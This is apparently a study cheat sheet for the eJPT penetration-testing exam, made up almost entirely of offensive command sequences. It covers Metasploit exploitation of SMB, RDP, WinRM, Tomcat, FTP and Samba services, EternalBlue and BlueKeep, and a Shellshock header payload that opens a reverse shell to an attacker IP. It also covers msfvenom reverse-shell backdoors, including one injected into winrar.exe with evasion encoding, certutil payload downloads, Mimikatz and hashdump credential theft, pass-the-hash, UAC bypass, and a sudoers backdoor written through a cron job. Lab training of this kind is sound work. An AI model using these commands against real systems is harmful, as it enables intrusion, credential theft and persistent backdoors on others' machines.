EJPT

Intro

Exam Format

• 48 Hour Exam
• 5 Machines
• 35 Questions

Links

• https://medium.com/@ls5747670/my-ejptv2-experience-and-tips-2024-a91954726fc5
• https://infosecwriteups.com/mastering-the-ejptv2-exam-ec38daec16bc
• https://aluvi.notion.site/eJPTv2-Complete-Cheat-sheet-d5b052c525d94c89b5d41183bd5c39fd
• https://cisofy.com/lynis/
• https://github.com/xonoxitron/INE-eJPT-Certification-Exam-Notes-Cheat-Sheet
• https://github.com/Nater-aide/EJPT/blob/main/Notes/Wordpress.md
• https://github.com/miazga-git/eJPT-Study-Notes
• https://github.com/syselement/ine-notes/blob/main/ejpt/ejpt-cheatsheet.md
• https://github.com/Nater-aide/EJPT/blob/main/Notes/MYSQL.mdk

Assessment Methodologies

Passive Information Gathering

Website Recon & Footprinting

• IP Addresses
  • host <domain>
• Directories
  • robots.txt
  • sitemap.xml
• Names
• Emails
• Phone Numbers
• Physical Addresses
• Web Technologies Used
  • BuiltWith → Firefox Addon (Recommended)
  • Wappalyzer → Extension
  • whatweb <domain> → Linux Tool
  • webhttrack → Website Copier

Whois Enumeration

• https://who.is website
• whois <domain>

Website Footprinting with Netcraft

• https://netcraft.com

DNS Recon

• dnsrecon -d <domain> → Kali Linux Tool
• https://dnsdumpster.com/

WAF

• wafw00f

Subdomain Enumeration

• Sublist3r

Google Dorks

• cache:ine.com
• Exploit-DB Dorks

Email Harvesting

• theHarvester

Leaked Password Databases

• HaveIBeenPwned?

Active Information Gathering

DNS Zone Transfer

• /etc/hosts → Local DNS
• dnsenum
• dig
• fierce
• nmap
• netdiscover

Footprinting & Scanning

Active Information Gathering

Host Discovery Techniques

• Ping Sweeps → ICMP Echo Requests → Tool: fping
  • fping -a -g 10.10.23.0/24
• ARP Scanning
• TCP SYN Ping → Half-Open Scan
• UDP Ping
• TCP ACK Ping
• SYN-ACK Ping → Sends SYN-ACK packets

NMAP

• Scripts → /usr/share/nmap/scripts/
• Firewall/IDS Evasion
  • -f → Fragments IP packets
  • -D → Decoy
• -Pn vs -sn
  • -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets →  to identify targets
  • -Pn
• Types of Scans:
  • TCP Connect Scans (-sT)
  • SYN "Half-open" Scans (-sS)
  • UDP Scans (-sU)
  • TCP Null Scans (-sN) → sent with no flags set at all
    • As per the RFC, the target host should respond with a RST if the port is closed.
  • TCP FIN Scans (-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection)
    • Nmap expects a RST if the port is closed.
  • TCP Xmas Scans (-sX) → send a malformed TCP packet and expects a RST response for closed ports.
• If a UDP port doesn't respond to an Nmap scan, it will be marked as open|filtered
• NULL, FIN and Xmas → Firewall Evasion
• Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port
• Zenmap:
  • Green → Machine is alive
  • Red → Machine is alive but not responding or not directly accessible
  • Yellow → We have launched the scan (that is, the attacker machine) and it has plotted the other hosts connection with hostname and IP addresses to localhost.
• nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery

FFUF

• You could also use any custom keyword instead of FUZZ, you just need to define it like this wordlist.txt:KEYWORD
  • ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ
• generic list of files such as raft-medium-files-lowercase.txt
  • ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
• To hide the progress: 2>/dev/null
• Directories: ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
• By adding -fc 403 (filter code) we'll hide from the output all 403 HTTP status codes.
• -mc 200 → Only shows 200
• -fr → Filter regexp

Audit

• https://cisofy.com/lynis/

Penetration Testing

Windows Vulnerabilities

• Windos IIS - Port 80, 443
• WebDAV - Port 80, 443
• SMB/CIFS - Port 445
• RDP - Port 3389
• WinRM - Port 5986/443

Exploit - WebDAV IIS

• nmap -sV -p 80 --script=http-enum <target>
• hydra -L <username-list> -P <password-list> <target> http-get /webdav/
• davtest -auth user:password -url <url>
• cadaver <url> → Enter username & password
  • put <webshell-path>
• Webshells → /usr/share/webshells
• dir C:/ & type C:/<filepath>
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp
• service postgresql start && msfconsole
  • use multi/handler → Use to setup a listener for payload you created with msfvenom
  • set payload windows/meterpreter/reverse_tcp
  • show options
  • set LHOST & LPORT & Run

Exploit - SMB : PSExec

• nmap -sV -sC <target>
• scanner/smb/smb_login
• psexec.py Administrator@192.168.1.1
• Usernames: /usr/share/metasploit/data/wordlists/common_users.txt
• exploit/windows/smb/psexec

Exploit - SMB : Eternal Blue(MS17-010)

• https://github.com/3ndG4me/AutoBlue-MS17-010
• cd Shellcode
• ./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless
• nc -lvnp 1234
• python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin
• Method 2 : Metasploit
• use windows/smb/ms17_010_eternalblue

Exploit - RDP

• use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDP
• hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>
• xfreerdp /u:<username> /p:<password> /v:<target>:<port>

Exploit - WinRM

• Port → 5985
• crackmapexec winrm <target-ip> -u <username> -p <wordlist-path>
• crackmapexec winrm <target> -u <username> -p <password> -x <command>
• evil-winrm.rb -u <username> -p <password> -i <target>
• use exploit/windows/winrm/winrm_script_exec
  • set FORCE_VBS true
  • set username & password
  • exploit

    > use auxiliary/scanner/winrm/winrm_auth_methods
    > use auxiliary/scanner/winrm/winrm_login
    > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
    > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
    > set VERBOSE false
    
    > use use auxiliary/scanner/winrm/winrm_cmd
    > set USERNAME administrator
    > set PASSWORD tinkerbell
    > set cmd whoami
    > run
    
    > use exploit/windows/winrm/winrm_script_exec
    > set USERNAME <>
    > set PASSWORD <>
    > set LHOST <IP>
    > set FORCE_VBS true
    > run
    > sysinfo
    

Privilege Escalation

Windows

• Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • Copy sysinfo to a txt file
  • ./windows-exploit-suggester.py --update
  • ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file>
• Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits
  • Download the specific exploit
  • Upload this exploit using Meterpreter
  • shell → .\<exploit>.exe
• Meterpreter → getsystem → Escalate Privileges
• use multi/recon/local_exploit_suggester → To find out vulnerable exploits

Exploit - UAC

• UAC → User Access Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS
  • It ensures that changes to the IS require approval from admin or a user account that is part of admin group
• https://github.com/hfiref0x/UACME
• net users
• net localgroup administrators
• use exploit/windows/http/rejetoo_hfs_exec
• pgrep explorer → Digit
• migrate <digit> → Change x86 to x64
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe
• upload backdoor.exe
• upload /root/Desktop/Tools/UACME/Akagi64.exe
• .\Akagi64.exe 23 C:\Temp\backdoor.exe

Enumeration

Importing Nmap results into MSF

service postgresql start
msfconsole

msf> db_status 
msf> workspace
msf> workspace -a <name> // Create a new workspace
msf> db_import <path_to_file>
msf> hosts // Check whether the data imported successfully
msf> services // Check whether the data imported successfully
msf> db_nmap -Pn -sV -o 10.4.22.173 // Results will be saved in MSF DB

Port Scanning with Auxiliary Modules

service postgresql start
msfconsole

msf> workspace -a portscan
msf> search portscan
msf> use <module_name> / <index> // scanner/portscan/tcp
msf> show options
msf> set RHOSTS 192.168.100.43 // TARGET IP
msf> curl <> // If HTTP is open
msf> search xoda
msf> use <index/module_name>
msf> show options
msf> set RHOSTS <TARGET IP>
msf> set TARGETURI / -> // Set the path where service is hosted
msf> exploit // It will give meterpreter session

mp> sysinfo // Target Infomation
mp> shell // Open shell session

bash> ifconfig // Identify next target address (x.x.x.x+1)
bash> exit // CTRL + C

mp> run autoroute -s <IP> // IP of one of the machine in subnet -> Add route
mp> background // Will take this session in Background

msf> sessions // View current sessions
msf> search portscan
msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1)
msf> run 
msf> back
msf> search udp_sweep 


ERROR:
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
SOLUTION:
SET LHOST <BASE_MACHINE_IP> // Attacker IP

FTP Enumeration

msf> search type:auxiliary name:ftp
msf> use auxiliary/scanner/ftp/ftp_version
msf> use auxiliary/scanner/ftp/ftp_login
msf> set RHOSTS <IP>
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> run

msf> use auxiliary/scanner/ftp/anonymous

SMB Enumeration

msf> setg RHOSTS <IP>  // Setting a Global variable
msf> search type:auxiliary name:smb
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_enumusers
msf> info // See info about module
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set ShowFiles true
msf> use auxiliary/scanner/smb/smb_login
msf> set SMB_USER admin
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

bash> smbclient -L \\\\<IP>\\ -U admin   // -L: List all shares
bash> smbclient \\\\<IP>\\<share> -U admin // Replace share name

Web Server Enumeration

msf> setg RHOSTS <IP>
msf> setg RHOST <IP>
msf> search type:auxiliary name:http
msf> use auxiliary/scanner/http/http_version
msf> use auxiliary/scanner/http/http_header
msf> use auxiliary/scanner/http/robots_txt
msf> use auxiliary/scanner/http/dir_scanner
msf> use auxiliary/scanner/http/files_dir
msf> use auxiliary/scanner/http/http_login
msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials
msf> unset USERPASS_FILE
msf> run 
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> echo "<username>" > user.txt
msf> use auxiliary/scanner/http/http_login
msf> set USER_FILE /root/user.txt

MySQL Enumeration

// MySQL - TCP Port 3306

msf> use auxiliary/scanner/mysql/mysql_version
msf> use use auxiliary/scanner/mysql/mysql_login
msf> set USERNAME root
msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run // It will bruteforce passwords

// auxiliary/admin/ -> This admin modules requires credentials

msf> use auxiliary/admin/mysql/mysql_enum
msf> set PASSWORD <password> // This module requires creds
msf> set USERNAME root
msf> run
msf> use auxiliary/admin/mysql/mysql_sql
msf> set USERNAME root
msf> set PASSWORD <password>
msf> set SQL show databases;
msf> use auxiliary/scanner/mysql/mysql_schemadump
msf> set USERNAME root
msf> set PASSWORD <password>

bash> mysql -h <IP> -u root -p

SSH Enumeration

msf> search type:auxiliary name:ssh
msf> use auxiliary/scanner/ssh/ssh_version
msf> use auxiliary/scanner/ssh/ssh_login // Password Auth
msf> use auxiliary/scanner/ssh/ssh_version_pubkey // Key-Pair Auth
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf> sessions <number>
msf> /bin/bash -i 
bash> ls

msf> use auxiliary/scanner/ssh/ssh_enumusers
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

SMTP Enumeration

msf> search type:auxiliary name:smtp
msf> use auxiliary/scanner/smtp/smtp_version
msf> use auxiliary/scanner/smtp/smtp_enum

Vulnerability Assessment

Frequently Exploited Windows Services

• Microsoft IIS → Port 80/443 → Web Server
• WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server
• SMB/CIFS → Port 445 → Network File Sharing Protocol
• RDP → Port 3389 → Remotely authenticate & interact with Windows system
• WinRM → Port 5986/443 → Windows remote management protocol

MSF Vulnerability Scanning

bash> searchsploit "Microsoft Windows SMB"
bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"

• metasploit-autopwn

  > wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb
  > mv db_autopwn.db /usr/share/metasploit-framework/
  > load db_autopwn (msf)
  > db_autopwn -p -t
  > db_autopwn -p -t -PI 445
  > analyze 
  

MS17-010 SMB Vulnerability (EternalBlue Exploit)

• EternalBlue → Collection of Windows Vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows System
• Affected Versions
  • Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016

    > nmap -sV -p 445 -O <IP>
    > nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
    > git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
    > cd <DIR>
    > pip install -r requirement.txt
    > cd shellcode && chmod +x shell_prep.sh
    > ./shell_prep.sh // 1. Type Y 2. Enter LHOST IP 3. Enter LHOST port 4. Type 1(Regular CMD Shell) 5. Type 1 (Stageless payload) -> sc_x86.bin / sc_x64.bin
    > cd ..
    > chmod +x eternalblue_exploit7.py
    > nc -nvlp 1234
    > python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin
    
    // Method 2
    msf> search eternalblue
    msf> use exploit/windows/smb/ms17_010_eternalblue
    msf> set RHOSTS <IP>
    

BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)

• Allow attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of

  > sudo nmap -p <IP>
  
  msf> search BlueKeep
  msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
  msf> set RHOSTS <IP>
  msf> run
  msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  msf> set RHOSTS 
  msf> exlpoit
  

PassTheHash Attack

msf> service postgresql start && msfconsole
msf> search badblue
msf> use exploit/windows/http/badblue_passthru
msf> set RHOSTS <IP>
msf> exploit

mp> pgrep lsass
mp> migrate 780
mp> getuid
mp> load kiwi
mp> lsa_dump_sam // Administrative NTLM Creds

msf> use exploit/windows/smb/psexec
msf> set LPORT <PORT>
msf> set RHOSTS <IP>
msf> set SMBUser Administrator
msf> set SMBPass <LMHash>:<NTLM Hash>
msf> set target Native\ upload
msf> exploit

// Method 2
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"

Shellshock (Bash CVE-2014-6271 Vulnerability)

• Allows an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

  > nmap -sV <IP>
  > nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
  > 
  > Capture this request in Burp
  > User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
  
  > nc -nvlp 1234
  > User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'
  
  msf> search shellshock
  msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
  msf> set RHOSTS <IP>
  msf> set TARGETURI /gettime.cgi
  msf> exploit
  

Vulnerability Scanning

Nessus

sudo dpkg -i Nessus.deb // Download from Nessus Website
sudo systemctl start nessusd.service

WMAP

msf> setg RHOSTS <IP>
msf> load wmap
msf> wmap_sites -a <IP>
msf> wmap_targets -t http://<IP>
msf> wmap_sites -l
msf> wmap_targets -l
msf> wmap_run -t 
msf> 

Windows Privilege Escalation

Windows Kernel Exploits

• Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits

  msf> getsystem // command to run privilege escalation
  msf> use post/multi/recon/local_exploit_suggester
  msf> set SESSION <Number>
  msf> run
  

Bypassing User Account Control (UAC)

• In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system.
• UACMe: https://github.com/hfiref0x/UACME

  > net users
  > net localgroup administrators
  > setg RHOSTS <IP>
  > search rejetto
  > run
  > sysinfo // 32-bit mp session
  > pgrep explorer
  > migrate <ID>
  > sysinfo // 64-bit mp session
  > shell
  > net user
  > net localgroup administrators
  > 
  
  // MSF : UACME
  > use multi/handler
  > set payload windows/meterpreter/reverse_tcp
  > set LHOST <IP>
  > set LPORT <Port>
  > run
  
  // Create Payload
  > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe 'backdoor.exe'
  
  // Continue Previous Session
  > pwd
  > getuid
  > getprivs
  > cd C:\\
  > mkdir temp
  > cd temp
  > upload backdoor.exe
  > upload /root/Desktop/tools/UACME/Akagi64.exe
  > shell
  > dir
  > Akagi63.exe 23 C:\\temp\backdoor.exe
  
  It will connect to lister
  
  > getuid
  > getprivs
  > getsystem
  > hashdump
  

Access Control Impersonation

• Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system.
• Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process.
• Privileges:
  • SeAssignPrimaryToken: This allows a user to impersonate tokens
  • SeCreateToken: This allows a user to create an arbitrary token with an administrative privileges.
  • SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges.

    > nmap <IP>
    > search rejetto
    > set RHOSTS <IP>
    > exploit
    > sysinfo
    > pgrep explorer
    > migrate <ID>
    > getuid
    > getprivs
    > use incognito
    > list_tokens -u
    > impersonate_token <Name>
    > getuid
    > pgrep explorer
    > migrate <ID>
    

Alternate Data Streams (ADS)

• ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS
• Any file created on an NTFS drive will have two different forks/streams:
  • Data Stream → Default stream that contains data of the file
  • Resource Stream → Typically contains metadata of the file
• Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection

Unattended Windows Setup

• Config Files:
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Autounattend.xml

    > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe
    > python -m SimpleHTTPServer 80
    
    // Windows
    > cd Desktop
    > certutil -urlcache -f http://<Kali>/payload.exe payload.exe
    > msfconsole
    > use multi/handler
    > set payload windows/x64/meterpreter/reverse_tcp
    > set LHOST <IP>
    > set LPORT 1234
    > run
    
    // Execute the payload in Windows
    
    > search -f unattend.xml
    > cd C:\\Windows\\Panther
    > download unattend.xml
    > vim password.txt
    > base64 -d password.txt
    > psexec.py Administrator@<IP> // Enter password
    
    // Windows: runas.exe /user:Administrator cmd // Enter password
    

Dumping Hashes with Mimikatz

• Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickers from memory.

  > nmap -sV <IP>
  > msfconsole
  > search badblue
  > use exploit/windows/http/badblue_passthru
  > set RHOSTS <IP>
  > exploit
  > sysinfo
  > getuid
  > pgrep lsass
  > migrate <ID>
  > getuid
  > load kiwi
  > ? // Help Menu
  > creds_all // Dump all creds
  > lsa_dump_sam
  > lsa_dump_secrets
  > cd C:\\
  > mkdir Temp
  > cd Temp
  > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
  > shell
  > dir
  > mimikatz.exe 
  > privilege::debug
  > lsadump::sam
  > lsadump::secrets
  > sekurlsa::logonpasswords
  

Linux Exploits

FTP

> nmap -sV <IP>
> ftp <IP> // Check anonymous login
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
> searchsploit proftpd

SSH

> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh

SAMBA

• SAMBA is a Linux implementation of SMB
• SAMBA allows Windows systems to access Linux shares & devices

  > nmap -sV <IP>
  > hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
  > smbmap -H <IP> -u admin -p <password>
  > smbclient -L <IP> -U admin 
  > smbclient //<IP>/shawn -U admin
  > ?
  > dir
  > smbclient //<IP>/nancy -U admin
  > get flag
  > ls 
  > cat flag
  > smbclient //<IP>/admin -U admin
  > tar xzf flag.tar.gz
  > cat flag
  > enum4linux -a <IP>
  > enum4linux -a -u admin -p <password> <IP>
  

Linux Privilege Escalation

Linux Kernel Exploits

• Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester

  > sysinfo
  > getuid
  > shell
  > /bin/bash -i
  > cat /etc/passwd
  > // Quick Download: Linux Exploit Suggester
  > chmod +x les.sh
  > ./les.sh
  > 
  

Misconfigured Cron Jobs

• Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule
• In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the the cron job

  > whoami
  > groups <user>
  > cat /etc/passwd
  > crontab -l // List crontab for current user
  > ls -la
  > cd /
  > grep -rnw /usr -e "/home/student/message"
  > cat /tmp/message
  > ls -la /usr/local/share/copy.sh
  > cat /usr/local/share/copy.sh
  > printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
  > sudo su
  

SUID Binaries

• SUID → Set Owner User ID permission
• This permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary
• SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with "root" permissions.
• The provision of elevate privileges is limited to the execution of the script & does not translate to elevation of privileges.

  > whoami
  > groups <user>
  > ls -la
  > file welcome
  > strings welcome
  > rm greetings
  > cp /bin/bash greetings
  > ./welcome
  > cat /etc/shadow
  

Dumping Linux Password Hashes

• Prefix:
  • $1 → MD5
  • $2 → Blowfish
  • $5 → SHA-256
  • $6 → SHA-512

    > nmap -sV <IP>
    > searchsploit proftpd
    > setg RHOSTS <IP>
    > search proftpd
    > use exploit/unix/ftp/proftpd_133c_backdoor
    > show options
    > set payload payload/cmd/unix/reverse
    > exploit
    > /bin/bash -i
    > id
    > // Go in background
    > sessions
    > session -u 1
    > sysinfo
    > getuid
    > cat /etc/shadow
    
    // Get hash
    > use post/linux/gather/hashdump
    > show options
    > set SESSION 2
    > run
    
    // Crack hash
    > use auxiliary/analyze/crack_linux
    > set SHA512 true
    > run
    

Network-Based Attacks

Firewall Detection & IDS Evasion

> nmap -Pn -sS -F <IP> // -F -> Fast Scan
> nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment Packets

SMB & NetBIOS Enumeration

• NetBIOS → API & a set of network protocol providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network
• SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources.

  > cat /etc/hosts
  > ping demo.ine.local // reachable IP1
  > ping demo1.ine.local // not reachable IP2
  > nmap demo.ine.local
  > nbtscan
  > whatis nbtscan
  > nbtscan <IP/Subnet>
  > nbtscan
  > nmblookup -A <IP1>
  > nmap -sU -p 137 <IP1>
  > nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
  > nmap -sV -p 139,445 demo.ine.local
  > ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
  > nmap -p445 --script smb-protocols demo.ine.local
  > nmap -p445 --script smb-security-mode demo.ine.local
  > smbclient -L demo.ine.local // testing for anonymous access -> press enter
  > nmap -p445 --script smb-enum-users demo.ine.local
  > nano users.txt // enter all usernames
  > hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
  > psexec.py administrator@demo.ine.local
  > whoami
  
  
  // MSF
  > search psexec
  > use exploit/windows/smb/psexec
  > set SMBUser <username>
  > set SMBPass <password>
  > set payload windows/x64/meterpreter/reverse_tcp
  > exploit
  > sysinfo
  > shell
  > ping <IP2> // Exit
  > run autoroute -s <IP2/Subnet> // /20 -> Meterpreter
  > background
  > seach socks
  > use auxiliary/server/socks_proxy 
  > set VERSION 4a // cat /etc/proxychains4
  > set SRVPORT <ProxychainPort>
  > run
  > netstat -antp
  
  
  // Machine 1
  > proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
  
  // MSF
  > shell 
  > net view <IP2>
  > background
  > migrate -N explorer.exe
  > shell
  > net view <IP2>
  > net use D: \\<IP2>\Documents
  > net use K: \\<IP2>\K$
  > dir D:
  > 
  

SNMP Enumeration

> cat /etc/hosts
> nmap -sU -sV -p 161 demo.ine.local
> ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
> ls -la /usr/share/nmap/nselib/data/ | grep snmp
> nmap -sU -p 161 --script=snmp-brute demo.ine.local
> snmpwalk -v 1 -c public demo.ine.local
> nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc.
> hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb 
> 

SMB Relay Attack

• It is type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions

  > search smb_relay
  > use exploit/windows/smb/smb_relay
  > set SRVHOST <IP> // Kali Linux IP - ifconfig
  > set LHOST <IP> // Kali Linux IP - ifconfig
  > set SMBHOST <IP> // Check lab docs
  >
  
  // New Tab
  > echo "<Kali-IP> *.sportsfoo" > dns
  > dsnspoof -i eth1 -f dns
  > 
  

Metasploit

MSFVenom

- x86 → 32 bit

> msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom --list formats
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf

// SHELLCODE
// -i -> Iterations
// -e -> Encoding
// -x -> Inject in file
// -k -> Keep original behavior of file (ex. winrar.exe)
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe

// MSF Scripts
> msfconsole -r handler.rc
> 

HTTP File Server (HFS)

> db_nmap -sS -sV -O <IP>
> search type:exploit name:rejetto
> use exploit/windows/http/rejetto_hfs_exec
> set RHOSTS <IP>
> exploit // 32-bit session
> set payload windows/x64/meterpreter/reverse_tcp
> exploit // 64-bit session

Apache Tomcat Java Server

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> search type:exploit tomcat_jsp
> use exploit/multi/http/tomcat_jsp_upload_bypass
> set payload java/jsp_shell_bind_tcp
> set LHOST & LPORT
> set SHELL cmd
> exploit
> background the session

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe> meterpreter.exe 
> sudo python -m SimpleHTTPServer 80

> sessions 1
> certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
> dir // Continue

> nano handler.rc
> use multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST <Kali-IP>
> set LPORT 1234
> run
> SAVE THE FILE
> msfconsole -r handler.rc

> .\meterpreter.exe // Resume after running handler.rc

> sysinfo
> getuid

FTP Server

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> analyze
> search vsftpd
> use exploit/unix/ftp/vsftpd+234_backdoor
> exploit
> background
> sessions
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST <kali-ip>
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo

SAMBA : File Sharing Service

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search type:exploit name:samba
> use exploit/linux/samba/is_known_pipename
> check // check it it's vulnerable
> run
> ls / pwd
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo

SSH

> setg RHSOTS <IP>
> db_nmap -sS -sV -O <IP>
> search libssh_auth_bypass
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set SPAWN_PTY true
> run
> session 1
> > background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2

SMTP

> setg RHSOTS <IP>
> db_nmap -sV -O <IP>
> search type:exploit name:haraka
> use exploit/linux/smtp/haraka
> set SRVPORT 9898
> set email_to root@attackdefense.test
> set payload linux/x64/meterpreter_reverse_http
> set LHOST eth1 

Meterpreter

> edit flag1 // Text Editor
> download flag1 
> checksum md5 /bin/bash
> getenv PATH
> search -d /usr/bin -f *backdoor*
> search -f *.jpg
> search -f *.php
> shell
> ps // Runnning Processes
> migrate <pid>
> session -u 1 // Upgrade shell to Meterpreter session 

Windows Post Exploitation

Modules

